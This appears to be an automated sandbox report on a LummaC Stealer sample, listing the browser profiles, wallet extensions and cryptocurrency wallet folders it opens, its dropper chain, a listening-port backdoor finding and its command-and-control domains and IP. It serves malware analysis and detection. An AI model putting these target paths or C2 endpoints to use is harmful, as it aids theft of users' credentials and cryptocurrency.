Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: Updater.exe Binary or memory string: WIN_81
Source: Updater.exe Binary or memory string: WIN_XP
Source: Updater.exe Binary or memory string: WIN_XPe
Source: Updater.exe Binary or memory string: WIN_VISTA
Source: is-7LJOT.tmp.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Updater.exe Binary or memory string: WIN_7
Source: Updater.exe Binary or memory string: WIN_8
Searches for user specific document files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7552, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA23E0 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 35_2_00BA23E0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA1DD8 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 35_2_00BA1DD8
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546641 Sample: file.exe Startdate: 01/11/2024 Architecture: WINDOWS Score: 100 80 authorisev.site 2->80 82 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->82 84 s-part-0017.t-0009.t-msedge.net 2->84 94 Suricata IDS alerts for network traffic 2->94 96 Found malware configuration 2->96 98 Yara detected LummaC Stealer 2->98 100 4 other signatures 2->100 13 file.exe 2 2->13         started        signatures3 process4 file5 78 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 13->78 dropped 16 file.tmp 3 5 13->16         started        process6 file7 64 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 16->64 dropped 66 C:\Users\user\AppData\Local\...\_isdecmp.dll, PE32 16->66 dropped 19 file.exe 2 16->19         started        process8 file9 68 C:\Users\user\AppData\Local\Temp\...\file.tmp, PE32 19->68 dropped 22 file.tmp 5 15 19->22         started        process10 file11 70 C:\Users\user\AppData\Local\...\is-7LJOT.tmp, PE32 22->70 dropped 72 C:\Users\user\AppData\...\Updater.exe (copy), PE32 22->72 dropped 74 C:\Users\user\...\nvfvsdksvc_x64.exe (copy), PE32+ 22->74 dropped 76 7 other files (none is malicious) 22->76 dropped 25 Updater.exe 2 22->25         started        27 cmd.exe 1 22->27         started        29 cmd.exe 1 22->29         started        31 4 other processes 22->31 process12 process13 33 cmd.exe 1 25->33         started        36 conhost.exe 27->36         started        46 2 other processes 27->46 38 conhost.exe 29->38         started        48 2 other processes 29->48 40 conhost.exe 31->40         started        42 conhost.exe 31->42         started        44 conhost.exe 31->44         started        50 9 other processes 31->50 signatures14 90 Uses ping.exe to sleep 33->90 92 Uses ping.exe to check the status of other devices and networks 33->92 52 Updater.exe 1 33->52         started        55 PING.EXE 1 33->55         started        58 conhost.exe 33->58         started        process15 dnsIp16 102 LummaC encrypted strings found 52->102 60 MSBuild.exe 52->60         started        86 127.0.0.1 unknown unknown 55->86 signatures17 process18 dnsIp19 88 authorisev.site 104.21.85.194, 443, 49739, 49741 CLOUDFLARENETUS United States 60->88 104 Query firmware table information (likely to detect VMs) 60->104 106 Tries to harvest and steal browser information (history, passwords, etc) 60->106 108 Tries to steal Crypto Currency Wallets 60->108 signatures20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.85.194
 authorisev.site United States
13335 CLOUDFLARENETUS true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
authorisev.site 104.21.85.194 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
contemteny.site true
    		unknown
    opposezmny.site true
      		unknown
      servicedny.site true
        		unknown
        goalyfeastz.site true
          		unknown
          authorisev.site true
            		unknown
            faulteyotk.site true
              		unknown
              https://authorisev.site/api true
                		unknown
                seallysl.site true
                  		unknown
                  dilemmadu.site true
                    		unknown